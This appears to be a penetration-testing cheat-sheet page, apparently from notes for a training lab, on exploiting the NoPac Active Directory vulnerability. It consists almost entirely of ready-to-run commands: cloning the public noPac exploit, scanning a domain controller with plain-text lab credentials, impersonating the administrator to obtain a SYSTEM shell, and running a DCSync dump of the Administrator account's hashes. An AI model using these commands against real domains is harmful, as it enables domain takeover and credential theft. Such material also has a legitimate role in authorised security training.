NoPac

NoPac is a privilege escalation vulnerability affecting Active Directory environments, allowing attackers to impersonate privileged accounts and execute malicious actions.

1. Clone NoPac Exploit Repository

Command:

sudo git clone https://github.com/Ridter/noPac.git

Description: Used to clone the NoPac exploit repository using Git. Performed from a Linux-based host.

2. Scan for NoPac Vulnerability

Command:

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Description: Runs scanner.py to check if a target system is vulnerable to NoPac/Sam_The_Admin from a Linux-based host.

3. Exploit NoPac to Gain SYSTEM Shell

Command:

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --shell --impersonate administrator -use-ldap

Description: Used to exploit the NoPac/Sam_The_Admin vulnerability and gain a SYSTEM shell (--shell). Performed from a Linux-based host.

4. Exploit NoPac for DCSync Attack

Command:

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump --just-dc-user INLANEFREIGHT/administrator

Description: Used to exploit the NoPac/Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host.

PreviousKerberoasting NextTransfering Files

Last updated 10 months ago

hashtag1. Clone NoPac Exploit Repository

hashtagCommand:

hashtag2. Scan for NoPac Vulnerability

hashtagCommand:

hashtag3. Exploit NoPac to Gain SYSTEM Shell

hashtagCommand:

hashtag4. Exploit NoPac for DCSync Attack

hashtagCommand:

1. Clone NoPac Exploit Repository

Command:

2. Scan for NoPac Vulnerability

Command:

3. Exploit NoPac to Gain SYSTEM Shell

Command:

4. Exploit NoPac for DCSync Attack

Command: